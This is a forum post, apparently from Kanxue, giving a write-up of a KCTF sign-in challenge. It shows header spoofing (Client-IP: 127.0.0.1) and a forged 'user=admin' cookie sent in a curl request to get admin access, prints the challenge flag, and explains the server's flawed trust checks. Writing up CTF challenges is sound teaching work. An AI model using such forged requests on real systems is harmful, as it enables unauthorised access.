-
-
[原创] 看雪 2023·KCTF 年度赛 > 签到题 解题报告
-
发表于: 2026-7-21 17:36 617
-
题目地址:
b47K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5K6j5X3u0T1j5U0u0S2i4K6u0V1x3K6M7I4z5q4)9J5k6o6b7I4y4o6m8Q4x3X3b7^5x3h3g2U0i4K6u0V1j5e0q4X3z5e0u0X3x3K6l9&6x3$3u0T1i4K6u0W2L8X3!0V1k6g2)9J5k6i4m8W2k6r3W2&6i4K6u0W2j5$3!0E0i4K6y4m8z5o6q4Q4x3V1j5`.
题目类型:
HTTP Header 伪造 + Cookie 越权
漏洞点:
服务端通过 Client-IP 请求头判断是否为本地管理员,同时通过 Cookie 中的 user 字段判断用户身份。
初始访问:
直接访问页面时,提示只有本地管理员权限才能访问。
测试过程:
1. 访问首页,发现提示:
本页面只有本地管理员权限才能访问
2. 尝试伪造本地来源 IP:
Client-IP: 127.0.0.1
3. 页面提示变化为:
你不是管理员,只有本地管理员权限才能访问此页面
4. 说明服务端接受 Client-IP 请求头作为本地 IP 判断依据。
5. 继续伪造管理员 Cookie:
Cookie: user=admin
6. 同时携带:
Client-IP: 127.0.0.1
Cookie: user=admin
7. 成功获得 flag。
最终请求:
curl -H "Client-IP: 127.0.0.1" \
-H "Cookie: user=admin" \
"ee7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5K6j5X3u0T1j5U0u0S2i4K6u0V1x3K6M7I4z5q4)9J5k6o6b7I4y4o6m8Q4x3X3b7^5x3h3g2U0i4K6u0V1j5e0q4X3z5e0u0X3x3K6l9&6x3$3u0T1i4K6u0W2L8X3!0V1k6g2)9J5k6i4m8W2k6r3W2&6i4K6u0W2j5$3!0E0i4K6y4m8z5o6q4Q4x3V1j5`."
Flag:
flag{tdQvKTtPj7v1lbhkDPesHb}
漏洞原因:
1. 服务端信任了用户可控的 Client-IP 请求头。
2. 服务端仅通过明文 Cookie user=admin 判断管理员身份。
3. 缺少真实会话校验和服务端权限控制。
赞赏记录
参与人
雪币
留言
时间
git_51951meggadf3df
非常支持你的观点!
2026-9-10 18:05
mb_lthgjpwj
为你点赞!
2026-8-21 07:38
npc0vo
感谢你分享这么好的资源!
2026-7-27 22:08
赞赏
他的文章
赞赏
雪币:
留言: